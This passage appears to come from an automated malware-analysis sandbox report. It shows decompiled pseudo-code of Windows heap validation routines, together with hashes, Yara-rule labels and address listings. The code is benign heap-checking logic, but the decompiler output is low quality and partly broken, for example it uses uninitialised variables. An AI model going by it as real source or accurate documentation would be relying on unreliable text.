                                                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                        • API String ID: 0-3591852110
                                                                                                        • Opcode ID: 6d373ee984df0e74de0a4dcccfd9a7d64c55be01c7d6fe7121a9c404e5b5bfbf
                                                                                                        • Instruction ID: 28cf692c1df7de3b6d415e32f72fee2b532360820aabcad9b7ed895970bedfb8
                                                                                                        • Opcode Fuzzy Hash: 6d373ee984df0e74de0a4dcccfd9a7d64c55be01c7d6fe7121a9c404e5b5bfbf
                                                                                                        • Instruction Fuzzy Hash: EA12C030200642DFDB25EF28C495BB6B7F5FF49314F188599E48A8B6A2D775EC84CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B84496, Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 56%
                                                                                                        			E00B84496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E00B849A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0xbb6378 = _t267;
						asm("int3");
						 *0xbb6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E00AF174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E00ACB150();
							} else {
								E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E00ACB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E00ACB150();
							} else {
								E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E00ACB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0xbb6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E00B09660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E00AF174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E00ACB150();
										} else {
											E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E00ACB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E00ACB150();
									} else {
										E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E00ACB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E00ACB150();
								} else {
									E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E00ACB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E00ACB150();
							} else {
								E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E00B84AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E00B7FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E00B723E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                                                                                        0x00b844a1
                                                                                                        0x00b844a3
                                                                                                        0x00b844a7
                                                                                                        0x00b844ac
                                                                                                        0x00b844af
                                                                                                        0x00b844b2
                                                                                                        0x00b844b9
                                                                                                        0x00b844bc
                                                                                                        0x00b847f2
                                                                                                        0x00b847f2
                                                                                                        0x00b847f8
                                                                                                        0x00b847fc
                                                                                                        0x00b847fe
                                                                                                        0x00b84804
                                                                                                        0x00b84805
                                                                                                        0x00b84805
                                                                                                        0x00b8480c
                                                                                                        0x00b84810
                                                                                                        0x00b84812
                                                                                                        0x00b84812
                                                                                                        0x00b84812
                                                                                                        0x00b84822
                                                                                                        0x00b84822
                                                                                                        0x00b84827
                                                                                                        0x00b84827
                                                                                                        0x00000000
                                                                                                        0x00b84827
                                                                                                        0x00b844c4
                                                                                                        0x00b844d3
                                                                                                        0x00b844d9
                                                                                                        0x00b844dc
                                                                                                        0x00b844de
                                                                                                        0x00b844e0
                                                                                                        0x00b84560
                                                                                                        0x00b84520
                                                                                                        0x00b84522
                                                                                                        0x00b84525
                                                                                                        0x00b84528
                                                                                                        0x00b8452b
                                                                                                        0x00b8452e
                                                                                                        0x00b84530
                                                                                                        0x00b84697
                                                                                                        0x00b8469d
                                                                                                        0x00b846a1
                                                                                                        0x00b846c0
                                                                                                        0x00b846c5
                                                                                                        0x00b846a3
                                                                                                        0x00b846b8
                                                                                                        0x00b846bd
                                                                                                        0x00b846cb
                                                                                                        0x00b846d4
                                                                                                        0x00b84677
                                                                                                        0x00b84677
                                                                                                        0x00b84679
                                                                                                        0x00b8467c
                                                                                                        0x00b8468a
                                                                                                        0x00b84690
                                                                                                        0x00b84690
                                                                                                        0x00b847f1
                                                                                                        0x00b847f1
                                                                                                        0x00b847f1
                                                                                                        0x00000000
                                                                                                        0x00b847f1
                                                                                                        0x00b84536
                                                                                                        0x00b84539
                                                                                                        0x00b8453c
                                                                                                        0x00b84636
                                                                                                        0x00b8463c
                                                                                                        0x00b84640
                                                                                                        0x00b8465f
                                                                                                        0x00b84664
                                                                                                        0x00b84642
                                                                                                        0x00b84657
                                                                                                        0x00b8465c
                                                                                                        0x00b84670
                                                                                                        0x00000000
                                                                                                        0x00b84542
                                                                                                        0x00b84542
                                                                                                        0x00b84546
                                                                                                        0x00b84548
                                                                                                        0x00b8454b
                                                                                                        0x00b84555
                                                                                                        0x00b8455b
                                                                                                        0x00b8455b
                                                                                                        0x00b8455b
                                                                                                        0x00b8455d
                                                                                                        0x00b8455d
                                                                                                        0x00b8455d
                                                                                                        0x00000000
                                                                                                        0x00b8455d
                                                                                                        0x00b8453c
                                                                                                        0x00b84579
                                                                                                        0x00b8457c
                                                                                                        0x00b84587
                                                                                                        0x00b84589
                                                                                                        0x00b84591
                                                                                                        0x00b84592
                                                                                                        0x00b84597
                                                                                                        0x00b84598
                                                                                                        0x00b845a1
                                                                                                        0x00b845ab
                                                                                                        0x00b845ab
                                                                                                        0x00b845a1
                                                                                                        0x00b845ae
                                                                                                        0x00b845b4
                                                                                                        0x00b845b9
                                                                                                        0x00b845bd
                                                                                                        0x00b84759
                                                                                                        0x00b84759
                                                                                                        0x00b8475f
                                                                                                        0x00b84761
                                                                                                        0x00b84763
                                                                                                        0x00b84765
                                                                                                        0x00b84768
                                                                                                        0x00b8476b
                                                                                                        0x00b8476d
                                                                                                        0x00b8479c
                                                                                                        0x00b8479c
                                                                                                        0x00b8479f
                                                                                                        0x00b847a2
                                                                                                        0x00b847a4
                                                                                                        0x00b84830
                                                                                                        0x00b84833
                                                                                                        0x00b84879
                                                                                                        0x00b8487d
                                                                                                        0x00b848f1
                                                                                                        0x00b848f3
                                                                                                        0x00b848f3
                                                                                                        0x00000000
                                                                                                        0x00b848f3
                                                                                                        0x00b8487f
                                                                                                        0x00b84885
                                                                                                        0x00b84887
                                                                                                        0x00b848a8
                                                                                                        0x00b848a8
                                                                                                        0x00b848ae
                                                                                                        0x00b848b0
                                                                                                        0x00b848dc
                                                                                                        0x00b848dc
                                                                                                        0x00b848dc
                                                                                                        0x00b848dc
                                                                                                        0x00b848ec
                                                                                                        0x00000000
                                                                                                        0x00b848ec
                                                                                                        0x00b848b2
                                                                                                        0x00b848bc
                                                                                                        0x00b848be
                                                                                                        0x00b848c1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b848c3
                                                                                                        0x00b848c3
                                                                                                        0x00b848c6
                                                                                                        0x00b848c9
                                                                                                        0x00b848cc
                                                                                                        0x00b848d1
                                                                                                        0x00b848d4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b848d6
                                                                                                        0x00b848d7
                                                                                                        0x00b848da
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b848da
                                                                                                        0x00b8494f
                                                                                                        0x00b84955
                                                                                                        0x00b84959
                                                                                                        0x00b84978
                                                                                                        0x00b8497d
                                                                                                        0x00b8495b
                                                                                                        0x00b84970
                                                                                                        0x00b84975
                                                                                                        0x00b84986
                                                                                                        0x00b84987
                                                                                                        0x00b8498a
                                                                                                        0x00b8498d
                                                                                                        0x00b84997
                                                                                                        0x00b847ef
                                                                                                        0x00b847ef
                                                                                                        0x00b847ef
                                                                                                        0x00000000
                                                                                                        0x00b847ef
                                                                                                        0x00b84890
                                                                                                        0x00b84890
                                                                                                        0x00b84891
                                                                                                        0x00b84891
                                                                                                        0x00b84894
                                                                                                        0x00b84897
                                                                                                        0x00b8489d
                                                                                                        0x00b848a0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b848a2
                                                                                                        0x00b848a3
                                                                                                        0x00b848a6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b848a6
                                                                                                        0x00b848fb
                                                                                                        0x00b84901
                                                                                                        0x00b84905
                                                                                                        0x00b84924
                                                                                                        0x00b84929
                                                                                                        0x00b84907
                                                                                                        0x00b8491c
                                                                                                        0x00b84921
                                                                                                        0x00b8492f
                                                                                                        0x00b84935
                                                                                                        0x00b84936
                                                                                                        0x00b84939
                                                                                                        0x00b84942
                                                                                                        0x00000000
                                                                                                        0x00b84947
                                                                                                        0x00b84835
                                                                                                        0x00b8483b
                                                                                                        0x00b8483f
                                                                                                        0x00b8485e
                                                                                                        0x00b84863
                                                                                                        0x00b84841
                                                                                                        0x00b84856
                                                                                                        0x00b8485b
                                                                                                        0x00b84869
                                                                                                        0x00b8486c
                                                                                                        0x00b8486f
                                                                                                        0x00b847e7
                                                                                                        0x00b847e7
                                                                                                        0x00000000
                                                                                                        0x00b847ec
                                                                                                        0x00b847aa
                                                                                                        0x00b847b0
                                                                                                        0x00b847b4
                                                                                                        0x00b847d3
                                                                                                        0x00b847d8
                                                                                                        0x00b847b6
                                                                                                        0x00b847cb
                                                                                                        0x00b847d0
                                                                                                        0x00b847de
                                                                                                        0x00b847df
                                                                                                        0x00b847e2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b8476f
                                                                                                        0x00b8476f
                                                                                                        0x00b84778
                                                                                                        0x00b84785
                                                                                                        0x00b84787
                                                                                                        0x00b8478c
                                                                                                        0x00b8478e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84790
                                                                                                        0x00b84792
                                                                                                        0x00b84794
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84796
                                                                                                        0x00b84799
                                                                                                        0x00000000
                                                                                                        0x00b84799
                                                                                                        0x00000000
                                                                                                        0x00b845c3
                                                                                                        0x00b845c3
                                                                                                        0x00b845c7
                                                                                                        0x00b845c7
                                                                                                        0x00b845ca
                                                                                                        0x00b845cf
                                                                                                        0x00b845d3
                                                                                                        0x00b845df
                                                                                                        0x00b845e4
                                                                                                        0x00b845e6
                                                                                                        0x00b845e8
                                                                                                        0x00b845ed
                                                                                                        0x00b845ed
                                                                                                        0x00b845f2
                                                                                                        0x00b845f2
                                                                                                        0x00b845f7
                                                                                                        0x00b845fc
                                                                                                        0x00b84602
                                                                                                        0x00b84606
                                                                                                        0x00b84609
                                                                                                        0x00b8460f
                                                                                                        0x00b846de
                                                                                                        0x00b846e3
                                                                                                        0x00b846e5
                                                                                                        0x00b846ec
                                                                                                        0x00b846ee
                                                                                                        0x00b846f6
                                                                                                        0x00b846f6
                                                                                                        0x00b846f6
                                                                                                        0x00b846f6
                                                                                                        0x00b846ec
                                                                                                        0x00b84615
                                                                                                        0x00b84615
                                                                                                        0x00b8461d
                                                                                                        0x00b8462e
                                                                                                        0x00b8462e
                                                                                                        0x00b8461d
                                                                                                        0x00b8460f
                                                                                                        0x00b84609
                                                                                                        0x00b846fd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84710
                                                                                                        0x00b8471a
                                                                                                        0x00b84720
                                                                                                        0x00b84720
                                                                                                        0x00b84722
                                                                                                        0x00b8472c
                                                                                                        0x00000000
                                                                                                        0x00b8472e
                                                                                                        0x00b8472e
                                                                                                        0x00000000
                                                                                                        0x00b8472e
                                                                                                        0x00b8472c
                                                                                                        0x00b84738
                                                                                                        0x00b8473c
                                                                                                        0x00b8474b
                                                                                                        0x00b84751
                                                                                                        0x00b84751
                                                                                                        0x00000000
                                                                                                        0x00b8473c
                                                                                                        0x00b848f4
                                                                                                        0x00b848f4
                                                                                                        0x00000000
                                                                                                        0x00b848f4

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                        • API String ID: 0-1357697941
                                                                                                        • Opcode ID: 6addcbc2d7e3101ed10f0fa7b894588dbeb1c61d73e1dc83b6e51d0f04e48f9f
                                                                                                        • Instruction ID: b90cbf6af7166b0da6b2314df12cb2df60623cd0d73cbb45c91b15a8f4838b06
                                                                                                        • Opcode Fuzzy Hash: 6addcbc2d7e3101ed10f0fa7b894588dbeb1c61d73e1dc83b6e51d0f04e48f9f
                                                                                                        • Instruction Fuzzy Hash: 54F14431610646EFCB25EFA8C491FBAB7F5FF09304F1885A9E046972A1D734AD85CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AEA309, Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 72%
                                                                                                        			E00AEA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0xbb8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E00AEA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E00AEDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E00AC9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E00ACA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0xbb8748 - 1;
						if( *0xbb8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E00ACB150();
								} else {
									E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E00ACB150();
								__eflags =  *0xbb7bc8;
								if( *0xbb7bc8 == 0) {
									__eflags = 1;
									E00B82073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0xbb8748 - 1;
							if( *0xbb8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E00AF174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E00AE7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E00B814FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E00AC9373(_t553, _t358);
							_t486 = _v32;
